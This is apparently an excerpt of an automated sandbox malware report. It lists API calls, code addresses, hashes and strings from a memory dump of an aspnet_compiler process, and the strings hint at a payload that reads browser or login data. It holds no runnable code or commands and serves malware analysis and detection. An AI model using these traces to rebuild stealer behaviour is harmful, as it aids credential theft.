                                                                                                                                                                                                                                                                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                  • String ID: -journal$-wal
                                                                                                                                                                                                                                                                  • API String ID: 438689982-2894717839
                                                                                                                                                                                                                                                                  • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                                                                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                                                                  • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                                                                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                                                                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3975816621-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                                                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                                                                  • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                                                                  • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                                                                  • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                                                                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2313361498-0
                                                                                                                                                                                                                                                                  • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                                                                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                                                                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2047574939-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                                                                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4218492932-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                                                                  • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004098B5
                                                                                                                                                                                                                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2014503067-0
                                                                                                                                                                                                                                                                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                  • String ID: gj
                                                                                                                                                                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                                                                  • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                                                                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                                                                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                                                                  • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4281309102-0
                                                                                                                                                                                                                                                                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                                                                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _snwprintfwcscat
                                                                                                                                                                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                                                  • API String ID: 384018552-4153097237
                                                                                                                                                                                                                                                                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                                                                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405498
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004054AD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                                                                  • String ID: 6$\
                                                                                                                                                                                                                                                                  • API String ID: 404372293-1284684873
                                                                                                                                                                                                                                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1331804452-0
                                                                                                                                                                                                                                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID: advapi32.dll
                                                                                                                                                                                                                                                                  • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                                                                  • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$_snwprintf
